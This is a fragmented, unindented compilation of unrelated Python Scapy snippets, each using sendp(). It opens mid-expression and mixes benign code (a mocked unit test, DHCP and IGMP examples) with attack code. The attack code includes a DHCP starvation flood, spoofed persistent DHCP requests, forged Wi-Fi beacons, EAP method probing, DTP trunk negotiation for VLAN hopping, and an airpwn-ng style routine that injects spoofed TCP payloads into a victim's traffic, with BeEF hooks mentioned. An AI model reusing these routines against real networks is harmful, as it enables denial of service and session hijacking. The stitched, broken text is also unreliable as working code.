Dot11Elt(ID=221, info="\x00\x50\xf2\x01\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x01")/
Dot11Elt(ID=42, info="\x00")/
Dot11Elt(ID=50, info="\x30\x48\x60\x6c")/
Dot11Elt(ID=221, info="\x00\x50\xf2\x02\x01\x01\x84\x00\x03\xa4\x00\x00\x27\xa4\x00\x00\x42\x43\x5e\x00\x62\x32\x2f\x00")
)
else:
raise Exception('Invalid privacy setting')
sendp(beacon, iface=interface, verbose=False)
def callback(channel, hubs, devices):
# Register hubs
for hub in hubs:
if hub not in ex_hubs:
queue.put(hub)
ex_hubs.append(hub)
# Register devices
for dev in devices[hub]["sub"]:
if dev not in ex_clients:
queue.put((dev, hub))
ex_clients.append(dev)
# Send packets
packets_to_send = packets.get(channel, [])
if packets_to_send:
sendp(packets_to_send, iface=iface)
def persistant(mac_and_ip, dhcp_server_ip, interface):
while (True):
for i in mac_and_ip:
transaction_id = random.randint(1, 900000000)
server_id = dhcp_server_ip
requested_addr = i[0]
options = [("message-type", "request"), ("server_id", server_id),
("requested_addr", requested_addr), ("end", "0")]
dhcp_request = Ether(dst='ff:ff:ff:ff:ff:ff', src=i[1]) \
/ IP(src=requested_addr, dst='255.255.255.255') \
/ UDP(sport=68, dport=67) \
/ BOOTP(chaddr=[mac2str(i[1])], xid=transaction_id) \
/ DHCP(options=options)
sendp(dhcp_request, iface=interface)
sleep(120)
def dhcpDiscover(src_mac_random, dhcp_server_ip, interface):
options = [("message-type", "discover"), ("max_dhcp_size", 1500),
("client_id", mac2str(src_mac_random)), ("lease_time", 10000),
("end", "0")]
transaction_id = random.randint(1, 900000000)
dhcp_discover = Ether(dst='ff:ff:ff:ff:ff:ff', src=src_mac_random) \
/ IP(src='0.0.0.0', dst=dhcp_server_ip) \
/ UDP(sport=68, dport=67) \
/ BOOTP(chaddr=[mac2str(src_mac_random)], xid=transaction_id, flags=0xffffff) \
/ DHCP(options=options)
sendp(dhcp_discover, iface=interface)
dhcp_offer = sniff(
count=1,
lfilter=lambda p: BOOTP in p and p[BOOTP].xid == transaction_id)
return dhcp_offer
def test_send_packet_to_sw(self):
eth = ethernet.ethernet()
ip6 = ipv6.ipv6()
icmp6 = icmpv6.icmpv6()
packet = eth / ip6 / icmp6
packet.serialize()
# sendrecv.sendp()のMock化
sendpkt = scapy_packet.Packet(packet.data)
self.mocker.StubOutWithMock(sendrecv, "sendp")
sendrecv.sendp(sendpkt).AndReturn(0)
self.mocker.ReplayAll()
self.mld_proc.send_packet_to_sw(packet)
self.mocker.UnsetStubs()
self.mocker.VerifyAll()
def dhcp_flood(**kwargs):
iface = kwargs["interface"]
count = kwargs["count"]
unique_hexdigits = str.encode("".join(set(string.hexdigits.lower())))
packet = (
l2.Ether(dst="ff:ff:ff:ff:ff:ff") /
inet.IP(src="0.0.0.0", dst="255.255.255.255") /
inet.UDP(sport=68, dport=67) /
dhcp.BOOTP(chaddr=volatile.RandString(12, unique_hexdigits)) /
dhcp.DHCP(options=[("message-type", "discover"), "end"])
)
sendrecv.sendp(
packet,
iface=iface,
count=count
)
def check_eap_type(self, eaptype, outer_identity = 'user', eapol_start = False):
"""
Check that an eaptype is supported.
errDict = {
0:"supported",
1:"not supported",
2:"could not determine",
3:"identity rejected"
}
"""
eapid = randint(1, 254)
if eapol_start:
eapol_start_request = RadioTap()/Dot11(FCfield=0x01, addr1=self.bssid, addr2=self.source_mac, addr3=self.bssid, SC=self.__unfuckupSC__(), type=2, subtype=8)/Dot11QoS()/LLC(dsap=170, ssap=170, ctrl=3)/SNAP(code=0x888e)/EAPOL(version=1, type=1)
self.sequence += 1
for i in range(0, 3):
sendp(eapol_start_request, iface=self.interface, verbose=False)
sniff(iface=self.interface, store=0, timeout=RESPONSE_TIMEOUT, stop_filter=self.__stopfilter__)
if not self.lastpacket == None:
if self.lastpacket.haslayer('EAP'):
fields = self.lastpacket.getlayer(EAP).fields
if 'type' in fields and fields['type'] == 1 and fields['code'] == 1:
i = 0
eapid = fields['id']
break
if i == 2:
return 2
eap_identity_response = RadioTap()/Dot11(FCfield=0x01, addr1=self.bssid, addr2=self.source_mac, addr3=self.bssid, SC=self.__unfuckupSC__(), type=2, subtype=8)/Dot11QoS()/LLC(dsap=170, ssap=170, ctrl=3)/SNAP(code=0x888e)/EAPOL(version=1, type=0)/EAP(code=2, type=1, id=eapid, identity=outer_identity)
self.sequence += 1
eap_legacy_nak = RadioTap()/Dot11(FCfield=0x01, addr1=self.bssid, addr2=self.source_mac, addr3=self.bssid, SC=self.__unfuckupSC__(), type=2, subtype=8)/Dot11QoS()/LLC(dsap=170, ssap=170, ctrl=3)/SNAP(code=0x888e)/EAPOL(version=1, type=0, len=6)/EAP(code=2, type=3, id=eapid + 1, eap_types=[ eaptype ])
self.sequence += 1
for i in range(0, 3):
sendp(eap_identity_response, iface=self.interface, verbose=False)
sniff(iface=self.interface, store=0, timeout=RESPONSE_TIMEOUT, stop_filter=self.__stopfilter__)
if not self.lastpacket == None:
if self.lastpacket.haslayer('EAP'):
fields = self.lastpacket.getlayer(EAP).fields
if fields['code'] == 4: # 4 is a failure
return 3
if 'type' in fields and fields['type'] == eaptype:
return 0
i = 0
break
if i == 2:
return 2
for i in range(0, 3):
sendp(eap_legacy_nak, iface=self.interface, verbose=False)
sniff(iface=self.interface, store=0, timeout=RESPONSE_TIMEOUT, stop_filter=self.__stopfilter__)
if not self.lastpacket == None:
if self.lastpacket.haslayer('EAP'):
fields = self.lastpacket.getlayer(EAP).fields
if 'type' in fields and fields['type'] == eaptype:
return 0
else:
return 1
return 2
def inject(self,
vicmac,
rtrmac,
dstmac,
vicip,
svrip,
vicport,
svrport,
acknum,
seqnum,
injection,
TSVal,
TSecr):
"""Send the injection using Scapy
This method is where the actual packet is created for sending
Things such as payload and associated flags are genned here
FIN/ACK flag is sent to the victim with this method
"""
global npackets
npackets += 1
sys.stdout.write(Bcolors.OKBLUE + '[*] Injecting Packet to victim ' + Bcolors.WARNING + vicmac + Bcolors.OKBLUE + ' (TOTAL: ' + str(npackets) + ' injected packets)\r' + Bcolors.ENDC)
sys.stdout.flush()
## Injection using Monitor Mode
if self.args.inj == 'mon':
hdr = Headers()
headers = hdr.default(injection)
## WEP/WPA
if self.args.wep or self.args.wpa:
packet = self.rTap\
/Dot11(
FCfield = 'from-DS',
addr1 = vicmac,
addr2 = rtrmac,
addr3 = dstmac,
subtype = 8L,
type = 2
)\
/Dot11QoS()\
/LLC()\
/SNAP()\
/IP(
dst = vicip,
src = svrip
)\
/TCP(
flags = 'FA',
sport = int(svrport),
dport = int(vicport),
seq = int(seqnum),
ack = int(acknum)
)\
/Raw(
load = headers + injection
)
## Open
else:
packet = RadioTap()\
/Dot11(
FCfield = 'from-DS',
addr1 = vicmac,
addr2 = rtrmac,
addr3 = dstmac
)\
/LLC()\
/SNAP()\
/IP(
dst = vicip,
src = svrip
)\
/TCP(
flags = 'FA',
sport = int(svrport),
dport = int(vicport),
seq = int(seqnum),
ack = int(acknum)
)\
/Raw(
load = headers + injection
)
if TSVal is not None and TSecr is not None:
packet[TCP].options = [
('NOP', None),
('NOP', None),
('Timestamp', ((round(time.time()), TSVal)))
]
else:
packet[TCP].options = [
('NOP', None),
('NOP', None),
('Timestamp', ((round(time.time()), 0)))
]
## WPA Injection
if self.args.wpa is not None:
if self.shake.encDict.get(vicmac) == 'ccmp':
### Why are we incrementing here? Been done before in wpaEncrypt(), verify this.
try:
self.shake.PN[5] += 1
except:
self.shake.PN[4] += 1
try:
packet = wpaEncrypt(self.shake.tgtInfo.get(vicmac)[1],
self.shake.origPkt,
packet,
self.shake.PN,
True)
except:
sys.stdout.write(Bcolors.FAIL + '\n[!] pyDot11 did not work\n[!] Injection failed\n ' + Bcolors.ENDC)
sys.stdout.flush()
else:
sys.stdout.write(Bcolors.FAIL + '\n[!] airpwn-ng cannot inject TKIP natively\n[!] Injection failed\n ' + Bcolors.ENDC)
sys.stdout.flush()
#packet = wpaEncrypt(self.shake.tgtInfo.get(vicmac)[0],
#self.shake.origPkt,
#packet,
#self.shake.PN,
#True)
if self.args.v is False:
sendp(packet, iface = self.interface, verbose = 0)
else:
sendp(packet, iface = self.interface, verbose = 1)
if self.args.pcap is True:
wrpcap('outbound.pcap', packet)
## WEP Injection
elif self.args.wep is not None:
try:
packet = wepEncrypt(packet, self.args.wep)
except:
sys.stdout.write(Bcolors.FAIL + '\n[!] pyDot11 did not work\n[!] Injection failed\n ' + Bcolors.ENDC)
sys.stdout.flush()
if self.args.v is False:
sendp(packet, iface = self.interface, verbose = 0)
else:
sendp(packet, iface = self.interface, verbose = 1)
if self.args.pcap is True:
wrpcap('outbound.pcap', packet)
## Open WiFi Injection
else:
if self.args.v is False:
sendp(packet, iface = self.interface, verbose = 0)
else:
sendp(packet, iface = self.interface, verbose = 1)
if self.args.pcap is True:
wrpcap('outbound.pcap', packet)
### Single packet exit point
### Used for BeEF hook examples and such
if self.args.single is True:
sys.stdout.write(Bcolors.OKBLUE + '[*] Injecting Packet to victim ' + Bcolors.WARNING + vicmac + Bcolors.OKBLUE + ' (TOTAL: ' + str(npackets) + ' injected packets)\r' + Bcolors.ENDC)
sys.exit(0)
## Injection using Managed Mode
else:
hdr = Headers()
headers = hdr.default(injection)
packet = Ether(\
src = self.getHwAddr(self.interface),\
dst = vicmac\
)\
/IP(
dst = vicip,
src = svrip
)\
/TCP(
flags = 'FA',
sport = int(svrport),
dport = int(vicport),
seq = int(seqnum),
ack = int(acknum)
)\
/Raw(
load = headers + injection
)
if TSVal is not None:
packet[TCP].options = [\
('NOP', None),\
('NOP', None),\
('Timestamp', ((round(time.time()), TSVal)))\
]
else:
packet[TCP].options = [\
('NOP', None),\
('NOP', None),\
('Timestamp', ((round(time.time()), 0)))\
]
if self.args.v is False:
sendp(packet, iface = self.interface, verbose = 0)
else:
sendp(packet, iface = self.interface, verbose = 1)
if self.args.pcap is True:
wrpcap('outbound.pcap', packet)
def run(self):
self.prepare()
self.packet.show()
sendp(x=self.packet, inter=1, count=1000)
def send(igmp):
ip_pkt = IGMP_ETH/IGMP_IP
pkt = ip_pkt/igmp
IGMPv3.fixup(pkt)
sendp(pkt, iface=args.iface)
def send_reply(self, reply):
sendp(reply, iface=self.ifto, **self.optsend)
def negotiate_trunk(iface=conf.iface, mymac=str(RandMAC())):
print("Trying to negotiate a trunk on interface %s" % iface)
p = Dot3(src=mymac, dst="01:00:0c:cc:cc:cc")/LLC()/SNAP()/DTP(tlvlist=[DTPDomain(),DTPStatus(),DTPType(),DTPNeighbor(neighbor=mymac)])
sendp(p)
def my_send(self, pkt):
sendp(pkt, iface=self.iface, verbose=self.verbose)
def send(self, packet): sendp(packet, iface=str(self.name), verbose=False)
from scapy.all import DHCP, ARP, BOOTP, Ether, UDP, TCP, IP
# data link layer
ethernet = Ether()
ethernet.show()
ethernet.dst = "ff:ff:ff:ff:ff:ff"
# network layer
ip = IP()
ip.show()
ip.dst = "255.255.255.255"
# transport layer
udp = UDP()
udp.show()
udp.sport = 68
udp.dport = 67
# application layer
bootp = BOOTP()
bootp.show()
bootp.flags = 1
dhcp = DHCP()
dhcp.show()
dhcp.options = [("message-type", "discover"), "end"]
packet = ethernet / ip / udp / bootp / dhcp
sendp(packet)
def send_beacon(self): """ Convenience function for sending beacons without starting a thread """ self.beacon.getlayer(Dot11).SC = self.__fixSC__() sendp(self.beacon, iface=self.interface, verbose=False)
